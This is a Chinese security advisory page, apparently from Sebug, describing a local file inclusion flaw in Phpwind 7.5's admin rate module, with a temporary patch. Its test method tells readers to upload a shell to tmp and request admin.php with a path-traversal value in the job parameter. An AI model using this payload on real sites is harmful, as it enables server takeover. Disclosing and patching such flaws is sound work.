当前位置:
首页 > 其他 > Phpwind7.5 后台本地包含漏洞

Phpwind7.5 后台本地包含漏洞

[tag]phpwind[/tag]

SSV ID:19065
SEBUG-Appdir:PHPWind
发布时间:2010-02-05
影响版本:
Phpwind7.5漏洞描述:
文件:hack\rate\admin.php
源码:

再看看hack\rate\template\layout.php:

EOT;
require_once $filepath;
include_once PrintEot ( 'adminbottom' );
?>

$job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。<*参考 http://www.oldjun.com/blog/index.php/archives/59/?jdfwkey=nhrcr2 *>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!先在tmp下上传一个shell,名为Action.php
然后访问:http://127.0.0.1/pw /admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/SEBUG安全建议:
临时补丁:

$filepath = H_R . "action/" . $action . "Action.php";
替换为:
$filepath = Pcv(H_R . "action/" . $action . "Action.php");// sebug.net [2010-02-05]

Phpwind7.5 后台本地包含漏洞:等您坐沙发呢!

发表评论

表情
还能输入210个字